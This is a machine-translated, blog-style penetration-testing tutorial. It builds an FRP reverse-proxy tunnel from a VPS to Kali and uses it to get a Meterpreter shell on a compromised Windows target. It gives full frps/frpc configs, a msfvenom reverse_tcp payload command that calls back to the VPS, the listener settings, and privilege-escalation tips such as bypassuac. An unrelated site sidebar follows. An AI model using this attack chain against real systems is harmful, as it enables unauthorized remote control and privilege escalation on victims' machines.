当前位置:网站首页>FRP reverse proxy +msf get shell
FRP reverse proxy +msf get shell
2022-07-03 00:15:00 【Lomi only bear】
0x00: brief introduction frp Is a reverse proxy tool . You can easily penetrate the intranet . Provide services to the Internet ,frp Support tcp agreement , http agreement , https Equal agreement type , also web Service supports routing and forwarding based on domain name .
0x01: Environmental accountability
Drone aircraft :x.x.174.171( Hereinafter referred to as target )
kali:192.168.1.106( Hereinafter referred to as kali)
vps:x.x.193.94( Hereinafter referred to as vps)
Obtained in the target webshell
0x02: Start reverse
One 、 stay vps Downloading in frp And edit frps.ini
vim frps.ini
#frp Connection port between server and client ,frps and frpc It has to be consistent bind_port = 7000
start-up frps:./frps -c ./frps.ini
Two 、 stay kali Downloading in frp And edit frpc.ini
vim frpc.ini
[common] server_addr = x.x.193.94 server_port = 7000 #frpc Work port , Must match the above frps bring into correspondence with [msf] type = tcp local_ip = 127.0.0.1 local_port = 5555 # Forward to this machine 5555 remote_port = 6000 # The service side with 6000 Port forward to local
start-up frpc:./frpc -c ./frpc.ini
here frp The reverse proxy is finished , Let's start with MSF Horse making and setting monitoring .
3、 ... and 、MSF Make a horse
msfvenom -p windows/meterpreter/reverse_tcp lhost=x.x.193.94 lport=6000 -f exe x>i.exe
Notice here :
lport The port of is you frpc.ini Inside remote_port = 6000 port
Four 、 Set listening 、 perform msf Horse
Notice here :
set lhost 127.0.0.1 # Set listening ip, It has to be with frpc Medium local_ip Agreement set lport 5555 # Set listening port , And frpc Medium local_port Agreement
Go to the target plane to execute i.exe
Observe vps Upper frp
Observe local kali
Obtained shell
tips: Built-in module Local Exploit Suggester. This module can help us identify which vulnerabilities in the system can be exploited , And provide us with the most suitable exp, Through this exp We can further raise our rights .
My most commonly used bypassuac modular
exploit/windows/local/bypassuac
边栏推荐
- Chapter 4 of getting started with MySQL: data types stored in data tables
- zhvoice
- 130 pages of PPT from the brick boss introduces the new features of Apache spark 3.2 & 3.3 in depth
- Missing number
- sysdig分析容器系统调用
- 国外的论文在那找?
- 容器运行时分析
- JSON data transfer parameters
- In February 2022, the ranking list of domestic databases: oceanbase regained its popularity with "three consecutive increases", and gaussdb is expected to achieve the largest increase this month
- 返回二叉树中最大的二叉搜索子树的根节点
猜你喜欢

Matlab 信号处理【问答笔记-1】

论文的英文文献在哪找(除了知网)?

附加:token;(没写完,别看…)

PR FAQ, what about PR preview video card?
![[error record] the flutter reports an error (could not resolve io.flutter:flutter_embedding_debug:1.0.0.)](/img/93/dc940caebe176177e4323317ebf4fa.jpg)
[error record] the flutter reports an error (could not resolve io.flutter:flutter_embedding_debug:1.0.0.)

Wechat applet basic learning (wxss)

Optimization of streaming media technology

Bean加载控制

maya渔屋建模

Digital collection trading website domestic digital collection trading platform
随机推荐
Is the multitasking loss in pytoch added up or backward separately?
67 page overall planning and construction plan for a new smart city (download attached)
开发知识点
教育学大佬是怎么找外文参考文献的?
What is the standard format of a 2000-3000 word essay for college students' classroom homework?
Improvement of RTP receiving and sending PS stream tool (II)
Happy Lantern Festival, how many of these technical lantern riddles can you guess correctly?
130 pages of PPT from the brick boss introduces the new features of Apache spark 3.2 & 3.3 in depth
Analyze ad654: Marketing Analytics
leetcode 650. 2 Keys Keyboard 只有两个键的键盘(中等)
Top Devops tool chain inventory
Bean加载控制
Interpretation of new plug-ins | how to enhance authentication capability with forward auth
MFC file operation
Digital twin smart factory develops digital twin factory solutions
Judge whether the binary tree is full binary tree
sourcetree 详细
Hit the industry directly! The propeller launched the industry's first model selection tool
Realization of mask recognition based on OpenCV
JDBC practice cases